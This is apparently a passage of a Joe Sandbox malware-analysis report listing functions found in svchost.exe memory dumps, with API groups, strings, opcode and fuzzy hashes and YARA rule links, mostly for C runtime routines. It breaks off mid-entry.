                                                                                                                                                                                                                                                Function 0000022F4B8F6920 Relevance: 12.2, APIs: 8, Instructions: 228COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2651743458.0000022F4B8F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022F4B8F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_22f4b8f0000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 190073905-0
                                                                                                                                                                                                                                                • Opcode ID: 631ceae67eae31c045c263838f49675c0354f8d7e0c0c05f5239024a302f0f12
                                                                                                                                                                                                                                                • Instruction ID: a365d369036b2b26bbd370a9d4c31e0717dc197af8bbad51161d873adee3a40e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 631ceae67eae31c045c263838f49675c0354f8d7e0c0c05f5239024a302f0f12
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8181D03DE00201A6FAD0BFE5D659B5B22B1EB89782F548235AB4447797FAB9C847C700
                                                                                                                                                                                                                                                Function 0000022F4B927520 Relevance: 12.2, APIs: 8, Instructions: 228COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2653068805.0000022F4B920000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_22f4b920000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 190073905-0
                                                                                                                                                                                                                                                • Opcode ID: 631ceae67eae31c045c263838f49675c0354f8d7e0c0c05f5239024a302f0f12
                                                                                                                                                                                                                                                • Instruction ID: c51334e39e5f5977e17591ee4fce557e36df1a67436e659bd583697e642eb82a
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 631ceae67eae31c045c263838f49675c0354f8d7e0c0c05f5239024a302f0f12
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9081A028E04241A6FAD8BFE5D7793AB66B0A785B80F5448359B0863397EBFCCD45C701
                                                                                                                                                                                                                                                Function 0000022F4B92A148 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2653068805.0000022F4B920000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_22f4b920000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                                                                • String ID: api-ms-
                                                                                                                                                                                                                                                • API String ID: 2559590344-2084034818
                                                                                                                                                                                                                                                • Opcode ID: 1bda5a7f51937e5fba9747c90859e34dfa5f89533a2a1b8d1dea998784ab284d
                                                                                                                                                                                                                                                • Instruction ID: 83e3394d01f89b93c26caa66c7161ea38b1c3006fc4177b8ceb87af8da782049
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1bda5a7f51937e5fba9747c90859e34dfa5f89533a2a1b8d1dea998784ab284d
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E431E42AE02640B1FED9AFC2EA2875623B4B749BA0F5949349E1D07392DFBDC446C300
                                                                                                                                                                                                                                                Function 0000022F4B934324 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2653068805.0000022F4B920000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_22f4b920000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                                                                                                • String ID: CONOUT$
                                                                                                                                                                                                                                                • API String ID: 3230265001-3130406586
                                                                                                                                                                                                                                                • Opcode ID: 4c50c600c840af11fb29c95c0db3c2be4712be37c9ecc349f2f252041d9feab2
                                                                                                                                                                                                                                                • Instruction ID: 843c655eff9d0843dd08c6668f8e99b76e5e9d14655632ee1d941493a23cb1a3
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4c50c600c840af11fb29c95c0db3c2be4712be37c9ecc349f2f252041d9feab2
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8B119625718B5096E390AFD6EA6831A76B0F78CBE4F005234DB5A87796CFB8C854C744
                                                                                                                                                                                                                                                Function 0000022F4B9237A4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2653068805.0000022F4B920000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_22f4b920000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentProcessProtectVirtual$HandleModule
                                                                                                                                                                                                                                                • String ID: wr
                                                                                                                                                                                                                                                • API String ID: 1092925422-2678910430
                                                                                                                                                                                                                                                • Opcode ID: d02d62af4a13f9151a1d64f675f2e823d7ed1e1e396348dfe74f8be14938124b
                                                                                                                                                                                                                                                • Instruction ID: 6d56411059032b96cf52a3874d0fa3f23297c4528b6b1fff269c96f9af339486
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d02d62af4a13f9151a1d64f675f2e823d7ed1e1e396348dfe74f8be14938124b
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 43117C2AB0874096FF98AF92F52826A63B0F789B84F040439DF8907B56EF7DC504C700
                                                                                                                                                                                                                                                Function 0000022F4B925B40 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2653068805.0000022F4B920000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_22f4b920000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Thread$Current$Context
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1666949209-0
                                                                                                                                                                                                                                                • Opcode ID: 2460c92bfe80c12f43b9e41940236e3d31cb2b1f5e55ffad558bfd096889bb43
                                                                                                                                                                                                                                                • Instruction ID: 32b35987f1af40d05fee103414a54acafcb92e9c4dcd903076f14a56b9b4652b
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2460c92bfe80c12f43b9e41940236e3d31cb2b1f5e55ffad558bfd096889bb43
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 64D1AF3AA05B5891EAB4AF56E5A435B77B0F388B84F100536EB8D4776ADF7CC550CB00
                                                                                                                                                                                                                                                Function 0000022F4B9214A4 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 83memoryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2653068805.0000022F4B920000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_22f4b920000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Heap$Process$Free
                                                                                                                                                                                                                                                • String ID: C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                • API String ID: 3168794593-4180442734
                                                                                                                                                                                                                                                • Opcode ID: 8f6c8013f26ca493c8b85487be1e8632cd5ea831c810228ac57a4b2b7c934696
                                                                                                                                                                                                                                                • Instruction ID: d3b748ffa8e7437680072e1bbf71ede5a447bdbe8d5ccdd4027060030305e6d9
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8f6c8013f26ca493c8b85487be1e8632cd5ea831c810228ac57a4b2b7c934696
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F33180AF90DBC0AAE395AFE5DA6925A3FB0F38DF40F09E035DB4403247DAA49810C740
                                                                                                                                                                                                                                                Function 0000022F4B92D510 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2653068805.0000022F4B920000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_22f4b920000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Value$ErrorLast
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2506987500-0
                                                                                                                                                                                                                                                • Opcode ID: 5a5575a5d1708c946e79aad68248bc2e3b8df018e302dfb520b8908bc7679156
                                                                                                                                                                                                                                                • Instruction ID: df63000a15ab9cdbea4b867a8bc7b3749937bdd8427f911b5941a662304442a8
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5a5575a5d1708c946e79aad68248bc2e3b8df018e302dfb520b8908bc7679156
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3F112C28E09650A1FADCBFA1D77A72B22625F447A4F184B349A2A467DBDEECC441D240
                                                                                                                                                                                                                                                Function 0000022F4B9219A4 Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2653068805.0000022F4B920000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_22f4b920000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 517849248-0
                                                                                                                                                                                                                                                • Opcode ID: 8727d58878f2a869f14b8fd26c384ee344685f44cd71b3c6aa4d19fd6db2488a
                                                                                                                                                                                                                                                • Instruction ID: ab1870f1ce097217d8c9d697d67a50e8735f31fb0d972f3aff40e2a40e560407
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8727d58878f2a869f14b8fd26c384ee344685f44cd71b3c6aa4d19fd6db2488a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 05015B25B04A4096FB94EF92E66835A63B1FB8CBC0F488434DF4943756DEBCC959C700
                                                                                                                                                                                                                                                Function 0000022F4B9236DC Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2653068805.0000022F4B920000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_22f4b920000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 449555515-0
                                                                                                                                                                                                                                                • Opcode ID: 6a4903f23145d629ccf7c0814750504573150cedf00e013b6ac3f495348c8662
                                                                                                                                                                                                                                                • Instruction ID: 0aa6039e52b4918b93c01abbad45a58908e3a9be5c1d2ca752cb9836a2e5124c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6a4903f23145d629ccf7c0814750504573150cedf00e013b6ac3f495348c8662
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 96015E68E1970096FFA4AF92EA2C31733B4BB49B82F044438CB4906366EF7CC048C710
                                                                                                                                                                                                                                                Function 0000022F4B921A48 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2653068805.0000022F4B920000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_22f4b920000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: FinalHandleNamePathlstrlen
                                                                                                                                                                                                                                                • String ID: \\?\
                                                                                                                                                                                                                                                • API String ID: 2719912262-4282027825
                                                                                                                                                                                                                                                • Opcode ID: 5d436592c77a9924c69bcb50891f68179583d79dfa63631e028aef339bed858e
                                                                                                                                                                                                                                                • Instruction ID: 4553abeba055ab04a372ecc5a7a4898a1852b619a9a65a411e6718b2ce24e83f
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5d436592c77a9924c69bcb50891f68179583d79dfa63631e028aef339bed858e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4CF04426B04681A2F7A0AFE1F6A875B6770F758BC8F845130DB4946556DFBCC698CB00
                                                                                                                                                                                                                                                Function 0000022F4B92C208 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2653068805.0000022F4B920000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_22f4b920000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                • Opcode ID: 0e03656a98ecf47c8c70bd094229c94189d23a90474f93e2876379b06086d007
                                                                                                                                                                                                                                                • Instruction ID: 38295ac2f10e6acd3025a4b2d7b3c232d4005dcb1e6e2f8afdf00ddaeae397fe
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0e03656a98ecf47c8c70bd094229c94189d23a90474f93e2876379b06086d007
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B4F0C229A15A04A1FB54AFA8E96C31B1370EB8AB60F501639D76A451F5CFBCC048C300
                                                                                                                                                                                                                                                Function 0000022F4B923058 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2653068805.0000022F4B920000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_22f4b920000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CombinePath
                                                                                                                                                                                                                                                • String ID: \\.\pipe\
                                                                                                                                                                                                                                                • API String ID: 3422762182-91387939
                                                                                                                                                                                                                                                • Opcode ID: 230e05f875843765b10c94681cacd2039b66fa3fae77185737d73b0c30566c8e
                                                                                                                                                                                                                                                • Instruction ID: a6493de3bd87cb8cdda4218573b9a46cfca1558a9276ad8d2e3f8f7c75dd7c6f
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 230e05f875843765b10c94681cacd2039b66fa3fae77185737d73b0c30566c8e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F2F0F458A1874092EA946F97FA2815A6671EB4DFD0F185030DF464775ADE7CC445C700
                                                                                                                                                                                                                                                Function 0000022F4B9250E0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2653068805.0000022F4B920000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_22f4b920000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentThread
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2882836952-0
                                                                                                                                                                                                                                                • Opcode ID: d320431a3885b97cf1102f80532d88567ca490bad17f23be6033182695dcdf12
                                                                                                                                                                                                                                                • Instruction ID: 370301996a2ab511c1da1f39ae5fb5ae372b66f22cbdb69476c090a222718a5b
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d320431a3885b97cf1102f80532d88567ca490bad17f23be6033182695dcdf12
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7102DA36A19B8096E7A4DF95E5A475BB7B0F3C4790F104425EB8E87BA9DBBCC444CB00
                                                                                                                                                                                                                                                Function 0000022F4B925720 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2653068805.0000022F4B920000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_22f4b920000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentThread
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2882836952-0
                                                                                                                                                                                                                                                • Opcode ID: 58d07a547137d2bff2769a738302b31e3611db479abe89d2490128d207b61db9
                                                                                                                                                                                                                                                • Instruction ID: 44fbaf4a04e1f9394b62009381191711660d1decb432d2e121cf4a7aea086afe
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 58d07a547137d2bff2769a738302b31e3611db479abe89d2490128d207b61db9
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8261B83AD19A40D6E6A49F55E56831BB7B0F388B84F104535EB8D43BAADBBCC540CB00
                                                                                                                                                                                                                                                Function 0000022F4B903A74 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2651743458.0000022F4B8F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022F4B8F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_22f4b8f0000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _set_statfp
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1156100317-0
                                                                                                                                                                                                                                                • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                                                                                                                                                                                • Instruction ID: 9c8685abdbdec31bd0a56245f8e3f9dfc6400e32a94bf70fe500d8c082ed615a
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B411E32EE18A0065F6D439E9DB7F36732706F6D374F0A4230AB66067EBDAE4C841D200
                                                                                                                                                                                                                                                Function 0000022F4B934674 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2653068805.0000022F4B920000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_22f4b920000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _set_statfp
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1156100317-0
                                                                                                                                                                                                                                                • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                                                                                                                                                                                • Instruction ID: bf8130e1b470344c310bc1a61583eaefc5403b2d5f03dcf87c41d7e09db68d9a
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 86114F2EE50A5121F6D43DECD66D3671170AB5D76CF072634ABB7067E7CAA498C1C310
                                                                                                                                                                                                                                                Function 0000022F4B928580 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2653068805.0000022F4B920000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_22f4b920000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                                                                                                • String ID: csm
                                                                                                                                                                                                                                                • API String ID: 2395640692-1018135373
                                                                                                                                                                                                                                                • Opcode ID: 34f41f65ebeee98072c04c36ffcb08d764f10b3598a8f5a66480d6cdd8a7e9c2
                                                                                                                                                                                                                                                • Instruction ID: 3670dfeb68e6a3868c26fbac9b743974663a211845548ffc8ba6f07efe711055
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 34f41f65ebeee98072c04c36ffcb08d764f10b3598a8f5a66480d6cdd8a7e9c2
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B251D439F11600AAEB98EF55E6A8B6A37B5FB44B88F108930DB454375AD7BDC841C700
                                                                                                                                                                                                                                                Function 0000022F4B92AFC0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2653068805.0000022F4B920000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_22f4b920000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CallEncodePointerTranslator
                                                                                                                                                                                                                                                • String ID: MOC$RCC
                                                                                                                                                                                                                                                • API String ID: 3544855599-2084237596
                                                                                                                                                                                                                                                • Opcode ID: 8ebe29515744ec85b4c7a5c69406529571aeda380531785c74bea0d93e5ddae6
                                                                                                                                                                                                                                                • Instruction ID: ad0099a4be0fb7298ef0ba603d511e01c9597efdd1c1fe225817b5613d30491c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8ebe29515744ec85b4c7a5c69406529571aeda380531785c74bea0d93e5ddae6
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D361B336D04BC491E7A5AF55E59439BB7B0F795B84F048A35EB9803B9ACBBCC194CB00
                                                                                                                                                                                                                                                Function 0000022F4B8FA770 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2651743458.0000022F4B8F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022F4B8F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_22f4b8f0000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                                                                                                • String ID: csm$csm
                                                                                                                                                                                                                                                • API String ID: 3896166516-3733052814
                                                                                                                                                                                                                                                • Opcode ID: 54601b73b573f90b6a3621b815e414a07fc66bdc2a6778d7d0011f6600b73964
                                                                                                                                                                                                                                                • Instruction ID: be2aa582aae54b33b491b9ee818e6c6d18c9888b0f349d6607bddd9af311e007
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 54601b73b573f90b6a3621b815e414a07fc66bdc2a6778d7d0011f6600b73964
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2A51043AA04280D6EBB4AF91D248B5A77B0F750BA6F148135DB9847BC7EBB8D453C700
                                                                                                                                                                                                                                                Function 0000022F4B92B370 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2653068805.0000022F4B920000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_22f4b920000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                                                                                                • String ID: csm$csm
                                                                                                                                                                                                                                                • API String ID: 3896166516-3733052814
                                                                                                                                                                                                                                                • Opcode ID: 54601b73b573f90b6a3621b815e414a07fc66bdc2a6778d7d0011f6600b73964
                                                                                                                                                                                                                                                • Instruction ID: 526968f0ac712b60914350b00ea95c0a29f9c2d21a42e9eb2121940c56cfde96
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 54601b73b573f90b6a3621b815e414a07fc66bdc2a6778d7d0011f6600b73964
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D5519F3AD0428096FBA8AF95D6A875A77F0F355B84F184535DB8847BD6CBBCD490C700
                                                                                                                                                                                                                                                Function 0000022F4B922F18 Relevance: 6.3, APIs: 5, Instructions: 93memoryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
